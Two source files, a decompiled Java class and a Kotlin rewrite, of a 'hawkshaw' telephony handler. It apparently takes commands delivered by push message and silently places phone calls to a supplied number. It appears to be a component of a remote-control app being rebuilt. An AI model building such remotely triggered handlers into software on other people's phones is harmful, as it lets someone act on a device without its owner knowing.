File: Dummy/hawkshaw/library/features/telephony/HandlerKt.java
package com.hawkshaw.library.features.telephony;

import Y1.K;
import android.content.Intent;
import android.net.Uri;
import com.hawkshaw.library.App;
import com.hawkshaw.library.datalayer.models.Command;
import com.hawkshaw.library.ktextensions.ManifestPermissionsKt;
import com.hawkshaw.library.logger.Logger;
import me.pushy.sdk.lib.paho.internal.ClientDefaults;

public final class HandlerKt {
    private static final String TAG = "TelephonyHandler";

    public /* synthetic */ class WhenMappings {
        public static final /* synthetic */ int[] $EnumSwitchMapping$0;

        static {
            int[] iArr = new int[Command.CommandType.values().length];
            try {
                iArr[Command.CommandType.MakeCall.ordinal()] = 1;
            } catch (NoSuchFieldError unused) {
            }
            $EnumSwitchMapping$0 = iArr;
        }
    }

    public static final void handleTelephonyCommand(Command command) {
        K.n(command, "command");
        if (WhenMappings.$EnumSwitchMapping$0[command.getType().ordinal()] == 1) {
            makeCall(command.getMakeCallRequest());
        }
    }

    private static final void makeCall(Command.MakeCallRequest makeCallRequest) {
        if (makeCallRequest != null) {
            if (!ManifestPermissionsKt.hasPermission("android.permission.CALL_PHONE")) {
                Logger.e$default(Logger.INSTANCE, TAG, "MakeCall: You don't have call_phone permission", (Exception) null, false, 12, (Object) null);
                return;
            }
            Intent intent = new Intent("android.intent.action.CALL");
            String phoneNumber = makeCallRequest.getPhoneNumber();
            intent.setData(Uri.parse("tel:" + phoneNumber));
            intent.setFlags(ClientDefaults.MAX_MSG_SIZE);
            App.Companion.getContext().startActivity(intent);
        }
    }
}

File: app/src/main/java/com/hawkshaw/library/features/telephony/HandlerKt.kt
package com.hawkshaw.library.features.telephony

import android.content.Intent
import android.net.Uri
import com.hawkshaw.library.App
import com.hawkshaw.library.datalayer.models.Command
import com.hawkshaw.library.ktextensions.ManifestPermissionsKt.hasPermission
import com.hawkshaw.library.logger.Logger
import android.util.Log // Added for logging
import androidx.core.net.toUri

private const val TAG = "TelephonyHandler"

/**
 * Handles telephony-related commands
 * 
 * @param command Command to handle
 */
fun handleTelephonyCommand(command: Command) {
    Log.d(TAG, "[DEBUG] handleTelephonyCommand called. Command Type: ${command.type}, Request: $command")
    when (command.type) {
        Command.CommandType.MakeCall -> {
            Log.d(TAG, "[DEBUG] Matched CommandType.MakeCall. Request: ${command.makeCallRequest}")
            makeCall(command.makeCallRequest)
        }
        else -> {
            Log.d(TAG, "[DEBUG] Unhandled command type: ${command.type}. Doing nothing.")
            /* Do nothing for other command types */
        }
    }
}

/**
 * Initiates a phone call
 * 
 * @param makeCallRequest Request containing the phone number to call
 */
private fun makeCall(makeCallRequest: Command.MakeCallRequest?) {
    Log.d(TAG, "[DEBUG] makeCall called with request: $makeCallRequest")
    if (makeCallRequest == null) {
        Log.d(TAG, "[DEBUG] makeCallRequest is null. Returning.")
        return
    }
    
    Log.d(TAG, "[DEBUG] makeCall: Checking for android.permission.CALL_PHONE permission.")
    if (!hasPermission("android.permission.CALL_PHONE")) {
        Log.w(TAG, "[DEBUG] makeCall: CALL_PHONE permission DENIED.")
        Logger.e( // Existing log
            TAG,
            "MakeCall: You don't have call_phone permission",
            b = false,
            i = 12,
            nothing = null
        )
        return
    }
    Log.d(TAG, "[DEBUG] makeCall: CALL_PHONE permission GRANTED.")

    val callUri = "tel:${makeCallRequest.phoneNumber}".toUri()
    Log.d(TAG, "[DEBUG] makeCall: Call URI created: $callUri")

    val intent = Intent(Intent.ACTION_CALL).apply {
        data = callUri
        addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
    }
    Log.d(TAG, "[DEBUG] makeCall: Intent created - Action: ${intent.action}, Data: ${intent.data}, Flags: ${intent.flags}")

    try {
        Log.d(TAG, "[DEBUG] makeCall: Attempting to App.getContext().startActivity(intent).")
        App.getContext().startActivity(intent)
        Log.d(TAG, "[DEBUG] makeCall: startActivity called successfully.")
    } catch (e: Exception) {
        Log.e(TAG, "[DEBUG] makeCall: Exception during startActivity: ${e.message}", e)
        // Optionally, re-throw or handle as per your app's error strategy
        // For now, just logging the error.
        Logger.e(TAG, "MakeCall: Error starting call activity - ${e.message}", e, false, 12, null)
    }
}
